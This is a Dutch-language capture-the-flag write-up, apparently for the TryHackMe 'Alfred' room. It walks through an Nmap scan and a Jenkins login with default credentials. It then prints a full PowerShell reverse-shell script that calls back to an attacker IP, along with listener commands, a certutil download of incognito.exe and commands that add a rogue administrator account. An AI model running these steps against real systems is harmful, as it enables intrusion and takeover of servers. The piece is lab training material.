Alfred – TryHackMe – Handmatig schrijven

Reading Time: ( Word Count: )

februari 22, 2021
Nextdoorsec-course

Intro

We maken gebruik van een veelvoorkomende misconfiguratie op een veelgebruikte automatiseringsserver (Jenkins) en krijgen toegang via windows tokens.

 

Opsomming

 

Nmap scan

┌(kali㉿kali)-[~] └─$ export IP=10.10.117.45 ┌(kali㉿kali)-[~] └─$ nmap -p- -A -Pn -v $IP
PORT STATE SERVICE VERSIE 80/tcp open http Microsoft IIS httpd 7.5 | http-methodes: | Ondersteunde methoden: OPTIONS TRACE GET HEAD POST |Potentieel riskante methoden: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: Site heeft geen titel (text/html). 3389/tcp open tcpwrapped | ssl-cert: Onderwerp: commonName=alfred | Afzender: commonName=alfred | Type openbare sleutel: rsa | Openbare sleutel bits: 2048 | Handtekeningalgoritme: sha1metRSAEncryptie | Niet geldig voor: 2020-10-02T14:42:05 | Niet geldig na: 2021-04-03T14:42:05 | MD5: fdb2 cd17 fad1 160d 06bc c1d8 31f3 7636 |_SHA-1: 6577 409f 2b1a 3e36 7ca7 4449 57f2 98c1 8750 3a3e |_ssl-date: 2021-02-06T18:18:26+00:00; -1s van scantijd. 8080/tcp open http Jetty 9.4.z-SNAPSHOT |_http-favicon: Onbekend favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 | http-robots.txt: 1 afgekeurde vermelding |_/ |_http-server-header: Jetty(9.4.z-SNAPSHOT) |_http-title: Site heeft geen titel (text/html;charset=utf-8).

Niets interessants op poort 80, een open RDP poort op 3389 en een andere http webserver op poort 8080 met een inlogformulier. Proberen in te loggen met admin:admin lukt.

Exploitatie

Executie van code op afstand

Na controle van het gereedschap vond ik een manier om commando’s uit te voeren op het onderliggende systeem:

1. Klik op “project” op de startpagina:

 

2. “Configuratie” aan de linkerkant:

 

2.1 Configureer je reverse shell script, start een listener & http server:

┌(kali㉿kali)-[~] └─$ cat revsh.ps1 $client = New-Object System.Net.Sockets.TCPClient('10.8.152.223',443); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|%{0}; while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) { $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i); $sendback = (iex $data 2>&1 | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> '; $sendbyte = ([text .encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush(); } $client.Close(); ┌──(kali㉿kali)-[~] └─$ sudo nc -nlvp 443 ┌──(kali㉿kali)-[~] └─$ python3 -m http.server 5300

 

3. Scroll naar beneden en voer uw opdracht in het veld “Opdracht” in & Sla op:

 

4. Nadat u op “Build” hebt geklikt, zou u een reverse shell moeten krijgen:

luisterend naar [any] 443 ... maak verbinding met [10 .8.152.221] vanaf (UNKNOWN) [10 .10.117.45] 50077 PS C:\Program Files (x86)\Jenkins\workspace\project> whoami alfred\bruce PS C:\Program Files (x86)\Jenkins\workspace\project>

Privilege-escalatie

PS > whoami /priv
PRIVILEGES INFORMATIE ---------------------- Privilege Naam Beschrijving Staat =============================== ========================================= ======== SeDebugPrivilege Debug-programma's ingeschakeld SeImpersonatePrivilege Een client imiteren na authenticatie Ingeschakeld SeCreateGlobalPrivilege Globale objecten aanmaken Ingeschakeld

SeDebugPrivilege & SeCreateGlobalPrivilege zijn ingeschakeld voor Bruce. Met deze tokens kunnen we ons voordoen als een andere gebruiker of er zelfs een aanmaken en hem administratieve rechten geven.

 

We moeten een binair bestand genaamd incognito.exe downloaden om dit te laten werken. We kunnen het daarna overbrengen vanaf een lokale http-server.

┌──(kali㉿kali)-[~] └─$ python3 -m http.server 5300
PS > certutil.exe -urlcache -split -f "http://10.8.152.221:5300/incognito.exe" incognito.exe

Nu we het binaire bestand naar de doelmachine hebben gedownload, kunnen we het gebruiken om een gebruiker toe te voegen.

PS > ./incognito.exe add_user nextdoorsec passwordd
PS > ./incognito.exe add_localgroup_user Administrators nextdoorsec ┌──(kali㉿kali)-[~] └─$ rdesktop -u nextdoorsec -p passwordd $IP

We hebben een gebruiker genaamd “nextdoorsec” toegevoegd met een wachtwoord “passwordd” en daarna toegewezen aan de groep “Administrators”. Om het te testen kunt u verbinding maken met de open RDP-poort.

Aydan Arabadzha

Aydan Arabadzha

Author

Aydan, a cybersecurity ace and AI visionary, thrives on the frontlines of offensive security. His passion birthed NextdoorSec, a groundbreaking cybersecurity firm. A relentless pioneer, Aydan is persistently pushing boundaries, shaping the future of the digital world one byte at a time.

Other interesting articles

“Apple neutraliseert misbruikte kwetsbaarheden: Een uitgebreide update”

Apple heeft beveiligingsverbeteringen geïntroduceerd om 'zero-day'-kwetsbaarheden te neutraliseren die zijn ...

“De AI-prestaties van ChatGPT: Verder dan de Turingtest of nog niet helemaal?”

ChatGPT, een kunstmatige intelligentie chatbot van OpenAI, heeft door zijn buitengewone capaciteiten veel stof ...

“Verliest Threads zijn draad? De Twitter rivaal van Instagram nader bekeken”.

Een artikel van de Wall Street Journal van vrijdag waarschuwde dat Instagram's nieuwe concurrent voor Twitter, ...

“VirusTotal’s datalek: Menselijke fout of systeemfout?”

Vrijdag betuigde VirusTotal spijt over het onopzettelijk blootstellen van de gegevens van meer dan 5.600 klanten ...
0 reacties

Een reactie versturen

Het e-mailadres wordt niet gepubliceerd. Vereiste velden zijn gemarkeerd met *